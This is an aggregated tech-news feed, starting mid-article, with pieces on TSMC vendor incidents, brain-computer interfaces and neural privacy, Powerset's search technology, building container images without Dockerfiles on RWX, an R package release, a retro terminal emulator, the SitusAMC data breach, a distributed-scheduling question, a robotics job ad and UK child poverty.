A couple of notable problems were both caused by vendors, not TSMC internally. In 2018, a computer virus was introduced to fabs via equipment from Japan. That incident sparked a whole new approach to cybersecurity both at TSMC and among fellow Taiwanese chipmakers. Less than a year later, a batch of contaminated photoresist from a chemical supplier forced the company to scrap a large number of wafers. It made up the production the following quarter, with the problem costing TSMC around $25 million in operating profit for the year.

Sharing is caring. This post is public & free, so please tell your friends what you’re reading.

Share

Linde trumpeted the TSMC contract when it landed the deal back in 2021, noting that it planned to invest $600 million into the facility. “While the project is capital and electricity intensive, it will only employ 14 plant employees and 14 truck drivers, documents from 2020 said,” the Arizona Tech Council later reported .

Apple’s A16 SoC was the first product taped out at the site, Culpium reported in September last year. AMD’s Ryzen 9000 and Nvidia Blackwell chips were since added to the lineup with designs from Bitdeer , among others, also qualified at the Arizona fab.

Thanks for reading. Please subscribe, if you haven’t already.

More from Culpium :

Mind-reading devices can now predict preconscious thoughts: is it time to worry?

Hacker News
www.nature.com
2025-11-24 18:26:09
Comments...
Original Article

Before a car crash in 2008 left her paralysed from the neck down, Nancy Smith enjoyed playing the piano. Years later, Smith started making music again, thanks to an implant that recorded and analysed her brain activity. When she imagined playing an on-screen keyboard, her brain–computer interface (BCI) translated her thoughts into keystrokes — and simple melodies, such as ‘Twinkle, Twinkle, Little Star’, rang out 1 .

But there was a twist. For Smith, it seemed as if the piano played itself. “It felt like the keys just automatically hit themselves without me thinking about it,” she said at the time. “It just seemed like it knew the tune, and it just did it on its own.”

Smith’s BCI system, implanted as part of a clinical trial, trained on her brain signals as she imagined playing the keyboard. That learning enabled the system to detect her intention to play hundreds of milliseconds before she consciously attempted to do so, says trial leader Richard Andersen, a neuroscientist at the California Institute of Technology in Pasadena.

Smith is one of roughly 90 people who, over the past two decades, have had BCIs implanted to control assistive technologies, such as computers , robotic arms or synthetic voice generators . These volunteers — paralysed by spinal-cord injuries, strokes or neuromuscular disorders, such as motor neuron disease (amyotrophic lateral sclerosis) — have demonstrated how command signals for the body’s muscles, recorded from the brain’s motor cortex as people imagine moving, can be decoded into commands for connected devices.

But Smith, who died of cancer in 2023, was among the first volunteers to have an extra interface implanted in her posterior parietal cortex, a brain region associated with reasoning, attention and planning. Andersen and his team think that by also capturing users’ intentions and pre-motor planning, such ‘dual-implant’ BCIs will improve the performance of prosthetic devices.

A woman sits in a wheelchair looking at a monitor displaying virtual piano keys.

Nancy Smith used a brain–computer interface to make music after a car accident left her paralysed from the neck down. Credit: Caltech

Andersen’s research also illustrates the potential of BCIs that access areas outside the motor cortex. “The surprise was that when we go into the posterior parietal, we can get signals that are mixed together from a large number of areas,” says Andersen. “There’s a wide variety of things that we can decode.”

The ability of these devices to access aspects of a person’s innermost life, including preconscious thought, raises the stakes on concerns about how to keep neural data private . It also poses ethical questions about how neurotechnologies might shape people’s thoughts and actions — especially when paired with artificial intelligence.

Meanwhile, AI is enhancing the capabilities of wearable consumer products that record signals from outside the brain. Ethicists worry that, left unregulated, these devices could give technology companies access to new and more precise data about people’s internal reactions to online and other content.

Ethicists and BCI developers are now asking how previously inaccessible information should be handled and used. “Whole-brain interfacing is going to be the future,” says Tom Oxley, chief executive of Synchron, a BCI company in New York City. He predicts that the desire to treat psychiatric conditions and other brain disorders will lead to more brain regions being explored. Along the way, he says, AI will continue to improve decoding capabilities and change how these systems serve their users. “It leads you to the final question: how do we make that safe?”

Consumer concerns

Consumer neurotech products capture less-sophisticated data than implanted BCIs do. Unlike implanted BCIs, which rely on the firings of specific collections of neurons, most consumer products rely on electroencephalography (EEG). This measures ripples of electrical activity that arise from the averaged firing of huge neuronal populations and are detectable on the scalp. Rather than being created to capture the best recording possible, consumer devices are designed to be stylish (such as in sleek headbands) or unobtrusive (with electrodes hidden inside headphones or headsets for augmented or virtual reality).

Still, EEG can reveal overall brain states, such as alertness, focus, tiredness and anxiety levels. Companies already offer headsets and software that give customers real-time scores relating to these states, with the intention of helping them to improve their sports performance, meditate more effectively or become more productive, for example.

AI has helped to turn noisy signals from suboptimal recording systems into reliable data, explains Ramses Alcaide, chief executive of Neurable, a neurotech company in Boston, Massachusetts, that specializes in EEG signal processing and sells a headphone-based headset for this purpose. “We’ve made it so that EEG doesn’t suck as much as it used to,” Alcaide says. “Now, it can be used in real-life environments, essentially.”

And there is widespread anticipation that AI will allow further aspects of users’ mental processes to be decoded. For example, Marcello Ienca, a neuroethicist at the Technical University of Munich in Germany, says that EEG can detect small voltage changes in the brain that occur within hundreds of milliseconds of a person perceiving a stimulus. Such signals could reveal how their attention and decision-making relate to that specific stimulus.

Although accurate user numbers are hard to gather, many thousands of enthusiasts are already using neurotech headsets. And ethicists say that a big tech company could suddenly catapult the devices to widespread use. Apple, for example, patented a design for EEG sensors for future use in its Airpods wireless earphones in 2023.

Yet unlike BCIs aimed at the clinic, which are governed by medical regulations and privacy protections, the consumer BCI space has little legal oversight, says David Lyreskog, an ethicist at the University of Oxford, UK. “There’s a wild west when it comes to the regulatory standards,” he says.

In 2018, Ienca and his colleagues found that most consumer BCIs don’t use secure data-sharing channels or implement state-of-the-art privacy technologies 2 . “I believe that has not changed,” Ienca says. What’s more, a 2024 analysis 3 of the data policies of 30 consumer neurotech companies by the Neurorights Foundation, a non-profit organization in New York City, showed that nearly all had complete control over the data users provided. That means most firms can use the information as they please, including selling it.

Responding to such concerns, the government of Chile and the legislators of four US states have passed laws that give direct recordings of any form of nerve activity protected status. But Ienca and Nita Farahany, an ethicist at Duke University in Durham, North Carolina, fear that such laws are insufficient because they focus on the raw data and not on the inferences that companies can make by combining neural information with parallel streams of digital data. Inferences about a person’s mental health, say, or their political allegiances could still be sold to third parties and used to discriminate against or manipulate a person.

“The data economy, in my view, is already quite privacy-violating and cognitive- liberty-violating,” Ienca says. Adding neural data, he says, “is like giving steroids to the existing data economy”.

Several key international bodies, including the United Nations cultural organization UNESCO and the Organisation for Economic Co-operation and Development , have issued guidelines on these issues. Furthermore, in September, three US senators introduced an act that would require the Federal Trade Commission to review how data from neurotechnology should be protected.

Heading to the clinic

While their development advances at pace, so far no implanted BCI has been approved for general clinical use. Synchron’s device is closest to the clinic. This relatively simple BCI allows users to select on-screen options by imagining moving their foot. Because it is inserted into a blood vessel on the surface of the motor cortex, it doesn’t require neurosurgery. It has proved safe, robust and effective in initial trials 4 , and Oxley says Synchron is discussing a pivotal trial with the US Food and Drug Administration that could lead to clinical approval.

Elon Musk’s neurotech firm Neuralink in Fremont, California, has surgically implanted its more complex device in the motor cortices of at least 13 volunteers who are using it to play computer games, for example, and control robotic hands. Company representatives say that more than 10,000 people have joined waiting lists for its clinical trials.

At least five more BCI companies have tested their devices in humans for the first time over the past two years, making short-term recordings (on timescales ranging from minutes to weeks) in people undergoing neurosurgical procedures. Researchers in the field say the first approvals are likely to be for devices in the motor cortex that restore independence to people who have severe paralysis — including BCIs that enable speech through synthetic voice technology .

As for what’s next, Farahany says that moving beyond the motor cortex is a widespread goal among BCI developers. “All of them hope to go back further in time in the brain,” she says, “and to get to that subconscious precursor to thought.”

Last year, Andersen’s group published a proof-of-concept study 5 in which internal dialogue was decoded from the parietal cortex of two participants, albeit with an extremely limited vocabulary. The team has also recorded from the parietal cortex while a BCI user played the card game blackjack (pontoon) 6 . Certain neurons responded to the face values of cards, whereas others tracked the cumulative total of a player’s hand. Some even became active when the player decided whether to stick with their current hand or take another card.

A woman removes cables from surgically implanted electrodes in the head of a man sitting in a wheelchair.

Casey Harrell (with his wife Levana Saxon) uses his brain implant to generate synthetic speech. Credit: Ian Bates/New York Times/Redux/eyevine

Both Oxley and Matt Angle, chief executive of BCI company Paradromics, based in Austin, Texas, agree that BCIs in brain regions other than the motor cortex might one day help to diagnose and treat psychiatric conditions. Maryam Shanechi, an engineer and computer scientist at the University of Southern California in Los Angeles, is working towards this goal — in part by aiming to identify and monitor neural signatures of psychiatric diseases and their symptoms 7 .

BCIs could potentially track such symptoms in a person, deliver stimulation that adjusts neural activity and quantify how the brain responds to that stimulation or other interventions. “That feedback is important, because you want to precisely tailor the therapy to that individual’s own needs,” Shanechi says.

Shanechi does not yet know whether the neural correlates of psychiatric symptoms will be trackable across many brain regions or whether they will require recording from specific brain areas. Either way, a central aspect of her work is building foundation models of brain activity. Such models, constructed by training AI algorithms on thousands of hours of neural data from numerous people, would in theory be generalizable across individuals’ brains.

Powerset’s natural language search system (2012)

Lobsters
brenocon.com
2025-11-24 18:24:03
Comments...
Original Article

There’s a lot to say about Powerset , the short-lived natural language search company (2005-2008) where I worked after college. AI overhype, flying too close to the sun, the psychology of tech journalism and venture capitalism, etc. A year or two ago I wrote the following bit about Powerset’s technology in response to a question on Quora . I’m posting a revised version here.

Question: What was Powerset’s core innovation in search? As far as I can tell, they licensed an NLP engine. They did not have a question answering system or any system for information extraction. How was Powerset’s search engine different than Google’s?

My answer: Powerset built a system vaguely like a question-answering system on top of Xerox PARC’s NLP engine. The output is better described as query-focused summarization rather than question answering; primarily, it matched semantic fragments of the user query against indexed semantic relations, with lots of keyword/ngram-matching fallback for when that didn’t work, and tried to highlight matching answers in the result snippets.

The Powerset system indexed semantic relations and entities (the latter often being wordnet/freebase nodes), did a similar analysis on the user query, then formed a database query against that index of semantic relations, synonym/hypernym expansions, and other textual information (e.g. word positions or gender identification). Then with all the rich (complicated) index information, you have neat features for ranking and snippet generation (i.e. query-focused summarization), but it’s so complicated it’s easy to screw up. (And don’t get me started on trying to run a segfault-prone Tcl/Prolog/C parser under an unstable 2006-era Hadoop…)

Here is a diagram I wrote in July 2007 to try to communicate internally what the entire system was doing. As you might imagine, it was difficult to keep everyone on the same page. This diagram only depicts the indexing pipeline; the query-time system would have required another diagram. NLP folks will note some rather surprising technology choices in some places. (Unweighted FST for NER? Yes. In fairness, it was eventually replaced by a statistical tagger. But the company did have >$12 million in funding at this point.)

As to whether this was “different than Google,” sure, I suppose. Certainly no serious search engine was crazy enough to do constituent parses (and unification parses, lexical lookups, coreference, etc.) of all sentences at index time — raising indexing costs, compared to keyword indexing, by perhaps 100x — but Powerset sure did.

It’s worth noting that since then, Google has added much more question-answering and structured information search, presumably using related but different techniques than Powerset used. (And Google even had some simple question-answering back then, as I recall; and, these days it’s said they parse the web all the time, at least for experimental purposes. They now have excellent groups of highly-regarded specialists in parsing, unsupervised lexical semantics, machine translation, etc., which Powerset never did.) And IBM’s Watson project more recently managed to produce a nice factoid question-answering system. In principle, deep semantic analysis of web text could be useful for search (and shallow NLP, like morphology and chunking, perhaps more so); but as the primary thing for a search startup to focus on, it seemed a little extreme.

As to what the “core innovation” was, that’s a loaded question. Was all this stuff useful? Usually I am cynical and say Powerset had no serious innovation for search. But that is just an opinion. Powerset developed some other things that were more user-visible, including a browser of the extracted semantic relations (“Factz” or “Powermouse”), a mostly separate freebase-specific query system (somewhat similar to Google’s recently released Knowledge Graph results), and completely separately, an open-source BigTable clone for index-time infrastructure (HBase, which has been developed quite a bit since then). In general, I found that design/UI engineering people respected Powerset for the frontends, scalability engineers respected Powerset for the HBase contributions, but NLP and IR experts were highly cynical about Powerset’s technology claims. If you get a chance, try asking researchers who were at ACL 2007 in Prague about Barney Pell’s keynote; I am told a number walked out while it was underway.

For good commentary on the situation at the time, see these Fernando Pereira blog posts from 2007: Powerset in PARC Deal , and Powerset in the NYT .

After the acquisition, Microsoft filed patent applications for all the Powerset-specific proprietary tech. You can read all of them on the USPTO website or wherever; for example, this page seems to list them.


Quora stuff: 21 votes by Ian Wong, Joseph Reisinger, William Morgan, Marc Bodnick, Cameron Ellis, Kartik Ayyar, Can Duruk, Brandon Smietana, Ronen Amit, Amit Chaudhary, Dare Obasanjo, Joseph Quattrocchi, Siqi Chen, Tim Converse, Zoltan Varju, Sundeep Yedida, Elliot Turner, Nenshad Bardoliwalla, Mike Mintz, Abhimanyu Gupta, and Nick Kaluzhenkoff

We deleted our Dockerfiles: a better, faster way to build container images

Lobsters
www.rwx.com
2025-11-24 18:23:11
Comments...
Original Article

Earlier this year, we shared some reflections on the limitations of Dockerfiles and BuildKit (Docker’s internal build engine). We talked to hundreds of teams about their CI/CD pipelines over the last 6 months and consistently see that docker build is slowing teams down.

We considered the problems and wondered if the strategies we used to build the fastest CI/CD platform could be leveraged to build container images as well. So we gave it a try - converting our Dockerfiles to RWX run definitions and seeing if we could extract container images natively from our own product.

And it worked! Two weeks ago, we deleted the Dockerfile for our application, and we deleted the step in our CI pipelines that previously ran docker build :

commit acae90a991fb4b2ecdfcf5c754ebe7169af57c33

Date: Fri Nov 7 18:28:36 2025 -0500

Remove the Dockerfile (#6330)

M .rwx/build-image-rwx.yml

Our container image builds got faster and the configuration became simpler.

In this post, we’re excited to share how we build container images, why it’s faster than building with Dockerfiles and BuildKit, how it has improved our developer experience, and how you can start deleting your Dockerfiles too.

How we build container images on RWX

RWX is a CI/CD platform built around the idea of executing builds as a graph of cacheable tasks . Each step in a build pipeline is represented by a task that runs atomically, rather than a series of stateful steps running as a single job tied to a single VM.

We save the filesystem changes from every task to use as input into subsequent tasks. This technique enabled us to package up those filesystem changes as layers in a container image.

In effect, we were already producing container images from every single task in an RWX run definition. And it was exceptionally fast. The thought of building a container image for every single step in a CI pipeline may sound like it’d be far too slow, but we’ve optimized it to happen very quickly.

Now, a Dockerfile that is implemented something like this:

Dockerfile

FROM node:24.11.0-trixie-slim

COPY package.json package-lock.json ./

CMD ["node", "server.js"]

Can be converted to an RWX definition that looks like this:

.rwx/image.yml

image: node:24.11.0-trixie-slim

repository: https://github.com/rwx-cloud/rwx-image-example.git

ref: ${{ init.commit-sha }}

echo "node" | tee $RWX_IMAGE/user

echo "node server.js" | tee $RWX_IMAGE/command

Docker pull

To prove this out, we implemented endpoints in our Cloud backend that correspond to the distribution registry endpoints . This enabled us to pull container images directly from our Cloud backend, for any step in an entire CI pipeline.

Although you can pull directly via docker pull , we shipped an rwx image pull command in the CLI to make it even easier.

Why it’s faster than using BuildKit

Distributed, right-sized compute

Docker builds run on a single machine, one step after another. Even when you use multi-stage builds, each stage competes for the same CPU, memory, disk, and network. And if you need to build multiple variants (different architectures, library versions, etc.) you typically end up running the whole build repeatedly.

RWX takes a different approach. By default, tasks in an RWX run definition (which correspond to individual steps in a Dockerfile) are distributed across multiple machines.

This way, each task can have its own right-sized compute: a task that needs 16 CPUs can claim it, while the next task can run on a smaller machine.

By running on distributed compute by default, we can avoid having an under-provisioned build machine, which inherently can end up being over-utilized or queueing builds.

.rwx/example.yml

run: apt-get update && apt-get install -y build-essential && apt-get clean

filter: [Gemfile, Gemfile.lock]

run: bundle exec rails assets:precompile

Cache is king

With a Dockerfile, once you change any layer, you force a rebuild of every layer thereafter. Straight from the Docker documentation:

And that's the Docker build cache in a nutshell. Once a layer changes, then all downstream layers need to be rebuilt as well. Even if they wouldn't build anything differently, they still need to re-run.

RWX container builds use content-based caching with filtering , which enables having a cache hit even after a cache miss.

Rather than having to carefully order the COPY statements in a Dockerfile to maintain caching, we can instead copy our whole repository into the image, and then filter subsequent command executions.

Here is a common example of a Dockerfile that would have suboptimal caching:

Dockerfile

RUN apt-get update && apt-get install -y build-essential nodejs && apt-get clean

# copy the Gemfiles first for caching

COPY Gemfile Gemfile.lock .

# unfortunately, this will cache miss if bundle install is a cache miss

COPY package.json package-lock.json .

RUN bundle exec rails assets:precompile

And here is the same image definition converted to RWX, which will always cache as optimally as possible.

.rwx/example.yml

run: apt-get update && apt-get install -y build-essential nodejs && apt-get clean

filter: [Gemfile, Gemfile.lock]

filter: [package.json, package-lock.json]

use: [code, node-modules]

use: [code, bundle, npm-build]

run: bundle exec rails assets:precompile

The cache key on RWX is determined by the command and the contents of the source files. Importantly, any files not specified in the filter will not be present on disk. This sandboxing approach ensures that cache hits will never be a false positive.

Automatic caching from full repository

We also just don’t need to agonize over properly configuring additional cache control levers like --cache-from and --cache-to . We frequently work directly with engineering organizations of all sizes to help them optimize their CI, and a shocking percentage of the companies we’ve worked with either have their Docker cache misconfigured or haven’t configured one at all.

Many pipelines will also do things like pull images before building, which can help a little bit, but in the case where there is a legitimate cache miss, it’s a waste of time to pull an image that ultimately will not be used.

RWX resolves cache hits seamlessly and automatically in real-time from the contents of the entire container repository; no configured required.

Network is fast, compression is slow

Docker compresses every layer before it is uploaded and decompresses every layer when it is downloaded. This was a great decision in 2013.

But in 2025, cloud networks are substantially faster than compression algorithms. It’s faster to upload 1 gigabyte of data than it is to gzip 1 gigabyte of data.

Compression is also a bad tradeoff because storage is cheap and compute is expensive.

In RWX, we transmit and store all of our layers and cache uncompressed.

Why we love our new developer experience

Context matters

With traditional Dockerfiles, the entire project has to be sent to the builder as a build context . For engineering teams with very large code repositories, this can be very slow.

This means that even when leveraging faster remote build machines, a fair amount of time can be spent uploading the repository.

Instead of pushing contents, it’s much faster to use git clone on the build machine to pull the code into the image.

While the git clone approach could be done with BuildKit, it’s not viable because of the caching mechanics. Individual files need to be added with a COPY before the entire repo is put into the image. Otherwise, the entire build will cache miss. Since filtering on RWX alleviates this concern, you can improve performance by cloning straight into the image rather than pushing build context.

First-class observability

Successful steps in a Docker build don’t output logs to the CLI by default, so interesting logs for a run command that indicate the cause of downstream problems are easily missed.

In RWX, the full logs for every task are preserved and easily accessible regardless of success or failure. We can leave ourselves rich annotations in our logs to understand what’s happening.

And every step in our build comes with its own diagnostics and explorable filesystem .

Faster container builds on GitHub Actions

Although we recommend running all of your CI on RWX, you can build container images on RWX directly from GitHub Actions by using the rwx-cloud/build-push-action .

.github/workflows/rwx.yml

name: Build on RWX and Push to Docker Hub

- uses: actions/checkout@v6

- name: Login to Docker Hub

uses: docker/login-action@v3

username: ${{ secrets.DOCKER_USERNAME }}

password: ${{ secrets.DOCKER_PASSWORD }}

- uses: rwx-cloud/build-push-action@v1

access-token: ${{ secrets.RWX_ACCESS_TOKEN }}

push-to: docker.io/myusername/myapp:latest

What’s next?

Deleting our Dockerfile may have started as an experiment, but we’ve become convinced that RWX is now the best way to build container images.

We get the benefits of producing container images without slowing down our CI and CD waiting for them to build. Ultimately, we ship faster while still generating reproducible and portable build artifacts.

You can experiment with building your own container images on RWX today.

And we’d love to talk more with you!

  • We’ll be at AWS re:Invent Booth 1958 from December 1-5. If you’re around, please stop by!
  • Say hello in the RWX Discord
  • Email co-founder Dan Manges at [email protected]

Never miss an update

Get the latest releases and news about RWX and our ecosystem with our newsletter.

Share this post

Enjoyed this post? Pleas share it on your favorite social network!

Dirk Eddelbuettel: RcppQuantuccia 0.1.3 on CRAN: Micro Maintenance

PlanetDebian
dirk.eddelbuettel.com
2025-11-24 18:22:00
A minor release of RcppQuantuccia arrived on CRAN moments ago. RcppQuantuccia started from the Quantuccia header-only subset / variant of QuantLib which it brings it to R. This project validated the idea of making the calendaring functionality of QuantLib available in a more compact and standalone p...
Original Article

RcppQuantuccia 0.1.3 on CRAN: Micro Maintenance

A minor release of RcppQuantuccia arrived on CRAN moments ago. RcppQuantuccia started from the Quantuccia header-only subset / variant of QuantLib which it brings it to R . This project validated the idea of making the calendaring functionality of QuantLib available in a more compact and standalone project – which we now do with qlcal which can be seen as a successor package to this earlier package. qlcal tracks QuantLib (releases) closely and provides approximately quarterly updates. Switching to using qlcal is generally recommended.

This release, the first in almost exactly two years, only updates internals (as detailed below). Notably it switches to ‘Authors@R’ to avoid a nag from CRAN on two platforms. The complete list changes for this release follows.

Changes in version 0.1.3 (2025-11-24)

  • A badge URL and link have been updated in README.md

  • The continuous integration sript switched first to r-ci-setup and then to the r-ci action with embedded setup

  • The DESCRIPTION file now uses Authors@R

Courtesy of CRANberries , there is also a diffstat report relative to the previous release. More information is on the RcppQuantuccia page. Issues and bugreports should go to the GitHub issue tracker .

If you like this or other open-source work I do, you can now sponsor me at GitHub .

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

/code/rcpp | permanent link

Show HN: I built an interactive HN Simulator

Hacker News
news.ysimulator.run
2025-11-24 17:52:43
Comments...

Cool-retro-term: terminal emulator which mimics look and feel of the old CRTs

Hacker News
github.com
2025-11-24 17:52:01
Comments...
Original Article

cool-retro-term

> Default Amber C:\ IBM DOS $ Default Green
Default Amber Cool Retro Term IBM DOS Default Green Cool Retro Term

Description

cool-retro-term is a terminal emulator which mimics the look and feel of the old cathode tube screens. It has been designed to be eye-candy, customizable, and reasonably lightweight.

It uses the QML port of qtermwidget (Konsole): https://github.com/Swordfish90/qmltermwidget .

This terminal emulator works under Linux and macOS and requires Qt5. It's suggested that you stick to the latest LTS version.

Settings such as colors, fonts, and effects can be accessed via context menu.

Screenshots

Image Image Image

Install

If you want to get a hold of the latest version, just go to the Releases page and grab the latest AppImage (Linux) or dmg (macOS).

Alternatively, most distributions such as Ubuntu, Fedora or Arch already package cool-retro-term in their official repositories.

Building

Check out the wiki and follow the instructions on how to build it on Linux and macOS .

Andrej Karpathy on X: implications of AI to schools

Hacker News
twitter.com
2025-11-24 17:51:02
Comments...

Real-estate finance services giant SitusAMC breach exposes client data

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 17:36:28
SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data. [...]...
Original Article

Real-estate finance services giant SitusAMC breach exposes client data

SitusAMC, a company that provides back-end services for top banks and lenders, disclosed on Saturday a data breach it had discovered earlier this month that impacted customer data.

As a real-estate (commercial and residential) financing firm, SitusAMC handles back-office operations in areas like mortgage origination, servicing, and compliance for banks and investors.

The company generates around $1 billion in annual revenue from 1,500 clients, some of whom are banking giants like Citi, Morgan Stanley, and JPMorgan Chase.

Wiz

While investigations with the help of external experts are ongoing, the company underlined that business operations haven't been affected and no encrypting malware was deployed on its systems.

SitusAMC stated that data from some of its clients, as well as their customers' data, were compromised as a result of the breach, though it didn't name any companies.

"On November 12, 2025, SitusAMC became aware of an incident that we have now determined resulted in certain information from our systems being compromised," reads the statement .

"Corporate data associated with certain of our clients' relationship with SitusAMC such as accounting records and legal agreements has been impacted. Certain data relating to some of our clients' customers may also have been impacted." SitusAMC promised to provide further updates as the investigation progresses.

In a statement to BleepingComputer, the company CEO said that SitusAMC is fully operational and clients are contacted directly about the incident.

"We are in direct contact with our clients about this matter. We remain focused on analyzing any potentially affected data and will provide updates directly to our clients as our investigation progresses" - Michael Franco, SitusAMC CEO

While SitusAMC received a security alert related to the incident on November 12, the company determined three days later that it was a breach and started to inform its residential customers on November 16 that it was investigating the attack.

The company continued to deliver updates to these customers and contacted those impacted by the breach individually up to November 22, when it notified all its clients and confirmed that data was stolen in the attack.

Due to the complexity of operations and data involved, it is unclear how many customers are impacted, and determining all of them will take a while.

BleepingComputer has contacted Citi, Morgan Stanley, and JPMorgan Chase to ask if SitusAMC notified them of a data breach and if their clients' data was compromised. A comment was not immediately available from any of the organizations.

If you have any information regarding this incident or any other undisclosed attacks, you can contact us confidentially via Signal at 646-961-3731 or at tips@bleepingcomputer.com .

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Ask HN: Scheduling stateful nodes when MMAP makes memory accounting a lie

Hacker News
news.ycombinator.com
2025-11-24 17:30:40
Comments...
Original Article

We’re hitting a classic distributed systems wall and I’m looking for war stories or "least worst" practices.

The Context: We maintain a distributed stateful engine (think search/analytics). The architecture is standard: a Control Plane (Coordinator) assigns data segments to Worker Nodes. The workload involves heavy use of mmap and lazy loading for large datasets.

The Incident: We had a cascading failure where the Coordinator got stuck in a loop, DDOS-ing a specific node.

The Signal: Coordinator sees Node A has significantly fewer rows (logical count) than the cluster average. It flags Node A as "underutilized."

The Action: Coordinator attempts to rebalance/load new segments onto Node A.

The Reality: Node A is actually sitting at 197GB RAM usage (near OOM). The data on it happens to be extremely wide (fat rows, huge blobs), so its logical row count is low, but physical footprint is massive.

The Loop: Node A rejects the load (or times out). The Coordinator ignores the backpressure, sees the low row count again, and retries immediately.

The Core Problem: We are trying to write a "God Equation" for our load balancer. We started with row_count, which failed. We looked at disk usage, but that doesn't correlate with RAM because of lazy loading.

Now we are staring at mmap. Because the OS manages the page cache, the application-level RSS is noisy and doesn't strictly reflect "required" memory vs "reclaimable" cache.

The Question: Attempting to enumerate every resource variable (CPU, IOPS, RSS, Disk, logical count) into a single scoring function feels like an NP-hard trap.

How do you handle placement in systems where memory usage is opaque/dynamic?

Dumb Coordinator, Smart Nodes: Should we just let the Coordinator blind-fire based on disk space, and rely 100% on the Node to return hard 429 Too Many Requests based on local pressure?

Cost Estimation: Do we try to build a synthetic "cost model" per segment (e.g., predicted memory footprint) and schedule based on credits, ignoring actual OS metrics?

Control Plane Decoupling: Separate storage balancing (disk) from query balancing (mem)?

Feels like we are reinventing the wheel. References to papers or similar architecture post-mortems appreciated.

Corvus Robotics (YC S18): Hiring Head of Mfg/Ops, Next Door to YC Mountain View

Hacker News
news.ycombinator.com
2025-11-24 17:00:33
Comments...
Original Article

Corvus Robotics is scaling the largest autonomous logistics data capture fleet ever built. If you're allergic to leaded solder, actual revenue, spreadsheets, or ambiguity -- this role is not for you. More "cardboard boxes," less "Pelican cases."

Our fleet of flying warehouse drones is 5x-ing in 2026, and I'm looking for a generalist ex-founder or manufacturing leader in the SF Bay Area who wants to get their hands dirty massively scaling manufacturing operations in the US and overseas.

We need someone who has worked on hardware products (not just SaaS), communicates clearly, and is relentlessly resourceful. Mandarin proficiency and leading a product through EVT/DVT/PVT is an added bonus.

If this resonates with you, DM me, or send a super short email to a@ our url with: - why you’re interested - what was the biggest manufacturing fuckup you've recovered from - your target comp

PS - Please reshare our LinkedIn post! https://www.linkedin.com/posts/mhkabirr_at-corvus-robotics-w...

Thanks, Jackie

France threatens GrapheneOS with arrests / server seizure for refusing backdoors

Hacker News
mamot.fr
2025-11-24 17:00:07
Comments...

Britain is one of the richest countries. So why do children live in poverty?

Hacker News
www.cnn.com
2025-11-24 16:53:11
Comments...
Original Article

London

Thea Jaffe never expected to use a baby bank . In fact, she was responsible for referring other single parents from her local community group to the charity Little Village , which provides essential supplies for new parents who otherwise wouldn’t be able to afford them – everything from strollers and cots to clothes, diapers, toys and books.

But when Jaffe, who lives in London , became pregnant unexpectedly with her second child, she couldn’t afford to buy everything she needed. “It’s so overwhelming having to accommodate a baby with no budget,” she told CNN.

“I was already struggling financially… but I didn’t know how bad things were going to get… Now things are at a point where I’m working full time, and I cannot pay my bills.”

A Little Village baby bank in Wembley, North London is filled with items new parents might need.

Child poverty has reached a record high in the United Kingdom as the country’s cost of living soars and its social security safety net falters following years of government austerity. With public services much weakened, charities like Little Village have stepped in.

The issue is firmly under the spotlight this week as campaign groups call on Britain’s Labour government to prioritize measures to reduce child poverty in its annual budget, which will be unveiled on Wednesday.

Around one-third of Britain’s children – about 4.5 million – now live in relative poverty, often measured as living in a household that earns below 60% of the national median income after housing costs, a government report published in April found.

One million of these children are destitute, going without their most basic needs of staying warm, dry, clothed and fed being met, according to a 2023 study by the Joseph Rowntree Foundation , which studies poverty and formulates policy to tackle it.

“We came across one family that were just existing on cornflakes and rice,” Little Village chief executive Sophie Livingstone told CNN.

“We have lots of families who are in one room, lots of mold, lots of very poor-quality housing even when people are housed,” she added.

Even for families that are able to meet their children’s basic needs, life is a month-to-month struggle, without any financial security.

“You just live in fear all the time and that’s not a fun place to be when you’ve got children relying on you,” Lia, a single mother to 7-year-old twin girls, told CNN after being connected through the Changing Realities Project, which documents parents living on low incomes. She asked to use a pseudonym to protect her family’s privacy.

“They want to do all the same things that their peers are doing… but the budget won’t allow that,” she said. After paying for essentials each month, she has no money left.

“Every single time I go out, I have to vigilantly and diligently make sure I’m not overspending. That’s a really anxiety-provoking situation to be in.”

A law graduate who lives in Hampshire, southeast England, Lia initially returned to work but says she would often be called mid-meeting by her childcare provider if one of her daughters, who has complex needs, dyspraxia and global developmental delay, was having a “tantrum or a meltdown.” She eventually had to quit her job.

“I go into survival mode,” she said. “I was in the (foster) care system growing up and I remember feeling so much struggle and angst like, ‘if I can just get through this, it’ll be ok.’ Yet still, that situation hasn’t changed; as much as I know I have a lot to offer and I try to be a good member of society, I still feel like no matter where I turn, there’s difficulty.”

And even for families earning well above the poverty line, the cost of housing and childcare, especially in London, can be so high that there is simply no money to spend on anything else. Around 70% of children living in poverty have at least one parent in work.

Thea Jaffe is pictured at a Little Village baby bank with the youngest of her three children.

Childcare is more expensive in the UK than in most other wealthy countries – costing about 25% of a couple’s and about 60% of a single parent’s net household income, according to figures released by think tank The Institute for Fiscal Studies in 2022.

Jaffe, the mother who makes use of the Little Village baby bank, works full-time in client solutions and says she earns £45,000 ($59,000) a year to support herself and her three children – well above the UK’s average. Still, she says she is “struggling every month to make sure everything is paid, not able to save anything, not able to do things for my kids.”

After paying for essentials – rent, childcare, food and household bills – she is left with £192 (around $250) a month for emergencies and to save for the next month in case there’s an error in her next social security payment – something she says is a regular occurrence.

Although child poverty has always been present in the UK, the rate of it is rising – and much faster than in other wealthy countries. Between 2012 and 2021, it rose by almost 20%, UNICEF found. Now, in 2025, the UK’s child poverty rate is higher than that of any European Union country except Greece, according to the Resolution Foundation , a living standards think tank.

The organization estimates that another 300,000 children will fall into poverty by 2030 if nothing changes.

The current poverty rate reflects inequalities present elsewhere in society, too. Almost half of children in Black and Asian communities are living in poverty, compared with 24% of White children, while children living in single-parent families or in families where someone is disabled are also more likely to live in poverty, figures from campaign organization the Child Poverty Action Group show.

Part of this rise is down to the same economic conditions afflicting other parts of the Western world – sluggish growth, and employment no longer offering the same financial security, as well as stubborn inflation that disproportionately affects essential goods and, therefore, people on low incomes.

